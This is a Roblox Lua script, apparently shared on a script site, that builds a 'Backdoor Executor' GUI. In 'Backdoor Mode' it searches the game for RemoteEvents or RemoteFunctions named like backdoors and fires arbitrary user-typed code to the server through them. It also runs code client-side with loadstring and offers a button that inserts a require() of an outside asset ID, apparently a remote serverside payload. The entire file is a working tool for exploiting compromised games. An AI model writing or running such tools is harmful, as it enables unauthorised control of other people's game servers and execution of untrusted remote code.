--[[
	WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
]]
local A="ScreenGui"
local B="BackdoorExecutor"
local C="Frame"
local D="TextLabel"
local E="TextBox"
local F="TextButton"
local G="SourceSansBold"
local H="MultiLine"
local I="TextWrapped"
local J="ClearTextOnFocus"
local K="LocalPlayer"
local L="CoreGui"
local M=game
local N=Color3.fromRGB
local O=UDim2.new

local S=Instance.new
local SG=S(A)
SG.Name=B
SG.Parent=M[L]

local MF=S(C)
MF.Size=O(0,440,0,420)
MF.Position=O(0.3,0,0.3,0)
MF.BackgroundColor3=N(255,255,255)
MF.BorderSizePixel=2
MF.Active=true
MF.Draggable=true
MF.Parent=SG

local T=S(D)
T.Text="Backdoor Executor By Bl4ckWh1te0"
T.Size=O(1,0,0,40)
T.BackgroundColor3=N(0,0,0)
T.TextColor3=N(255,255,255)
T.Font=Enum.Font[G]
T.TextSize=20
T.Parent=MF

local CB=S(E)
CB.Size=O(1,-20,1,-220)
CB.Position=O(0,10,0,50)
CB[H]=true
CB[I]=true
CB[J]=false
CB.Text="-- Write your Lua code here"
CB.BackgroundColor3=N(240,240,240)
CB.TextColor3=N(0,0,0)
CB.Font=Enum.Font.Code
CB.TextSize=16
CB.Parent=MF

-- Polaira button
local PB=S(F)
PB.Size=O(0,120,0,40)
PB.Position=O(0,20,1,-180)
PB.BackgroundColor3=N(0,0,0)
PB.TextColor3=N(255,255,255)
PB.Text="Polaira"
PB.Font=Enum.Font[G]
PB.TextSize=18
PB.Parent=MF

-- Other buttons (Execute, Clear, Scanner, Backdoor Mode, Client Mode)
local function makeBtn(txt,posX,posY)
    local b=S(F)
    b.Size=O(0,120,0,40)
    b.Position=O(0,posX,1,posY)
    b.BackgroundColor3=N(0,0,0)
    b.TextColor3=N(255,255,255)
    b.Text=txt
    b.Font=Enum.Font[G]
    b.TextSize=18
    b.Parent=MF
    return b
end

local EB=makeBtn("Execute",20,-130)
local CBt=makeBtn("Clear",160,-130)
local SB=makeBtn("Scanner",300,-130)

local BB=S(F)
BB.Size=O(0,200,0,40)
BB.Position=O(0,20,1,-70)
BB.BackgroundColor3=N(0,0,0)
BB.TextColor3=N(255,255,255)
BB.Text="Backdoor Mode"
BB.Font=Enum.Font[G]
BB.TextSize=18
BB.Parent=MF

local CBb=S(F)
CBb.Size=O(0,200,0,40)
CBb.Position=O(0,220,1,-70)
CBb.BackgroundColor3=N(0,0,0)
CBb.TextColor3=N(255,255,255)
CBb.Text="Client Mode"
CBb.Font=Enum.Font[G]
CBb.TextSize=18
CBb.Parent=MF

local Mode="Client"

local function fBD()
    for _,v in pairs(M:GetDescendants()) do
        if v:IsA("RemoteEvent") or v:IsA("RemoteFunction") then
            if v.Name:lower():find("backdoor") or v.Name:lower():find("remote") then return v end
        end
    end
end

EB.MouseButton1Click:Connect(function()
    if Mode=="Backdoor" then
        local r=fBD()
        if r then pcall(function() r:FireServer(CB.Text) end) else warn("No backdoor found in this game.") end
    else
        loadstring(CB.Text)()
    end
end)

CBt.MouseButton1Click:Connect(function() CB.Text="" end)

SB.MouseButton1Click:Connect(function()
    local r=fBD()
    if r then
        M.StarterGui:SetCore("SendNotification",{Title="Scanner ✅";Text="Backdoor Found";Duration=5})
    else
        M.StarterGui:SetCore("SendNotification",{Title="Scanner ❌";Text="No backdoor found.";Duration=5})
    end
end)

BB.MouseButton1Click:Connect(function()
    Mode="Backdoor"
    BB.BackgroundColor3=N(0,200,0)
    CBb.BackgroundColor3=N(0,0,0)
end)

CBb.MouseButton1Click:Connect(function()
    Mode="Client"
    CBb.BackgroundColor3=N(0,200,0)
    BB.BackgroundColor3=N(0,0,0)
end)

PB.MouseButton1Click:Connect(function()
    local username=M.Players[K].Name
    CB.Text='require(123255432303221):Pload("'..username..'")'
end)